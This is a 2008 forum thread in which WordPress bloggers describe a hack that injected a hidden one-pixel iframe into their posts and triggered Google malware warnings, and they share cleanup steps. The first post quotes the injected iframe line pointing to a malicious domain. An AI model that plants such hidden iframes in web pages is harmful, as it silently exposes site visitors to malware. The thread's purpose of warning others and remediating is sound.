1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Hacker sabotoging sites in Google with malware code

Discussion in 'General Chat' started by domainer_10, Feb 21, 2008.

  1. #1
    Recently one of my blogs got a malware warning. I sent in a review at google and they rejected it. I then looked at my code more closely and realized somehow someone inserted

    Where **** = iframe

    <***** src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>


    I then noticed another blogger I know complaining about how he also got a malware warning for his site. I looked over his site and noticed HE TOO also had the same code inserted into his post by a hacker.
    SEMrush
    Both of our sites are using wordpress. I'm using the most recent version.
     
    domainer_10, Feb 21, 2008 IP
    SEMrush
  2. domainer_10

    domainer_10 Peon

    Messages:
    1,720
    Likes Received:
    24
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I removed the code, they were using an exploit in a older version of wordpress.


    Anyways, the point is hackers are now installing stuff on websites that can cause you to get a malware warning on your website. So now we have ONE more thing that google can screw us over with.
     
    domainer_10, Feb 21, 2008 IP
  3. seo daddy

    seo daddy Active Member

    Messages:
    424
    Likes Received:
    8
    Best Answers:
    0
    Trophy Points:
    60
    #3
    Interesting:eek:
    Was this on the latest version of wordpress?

    I think this bug hass been fixed by matt and the wordpress gang..
     
    seo daddy, Feb 21, 2008 IP
  4. SB Marketing

    SB Marketing Peon

    Messages:
    66
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #4
    I had the same issue. the Steps I took to Resolve the Issue.

    - Installed latest version of Word Press

    - Deleted script from posts (found in 2)

    - Replied through Google webmasters tools that site was clean.

    Hope this helps some of you.
     
    SB Marketing, Feb 21, 2008 IP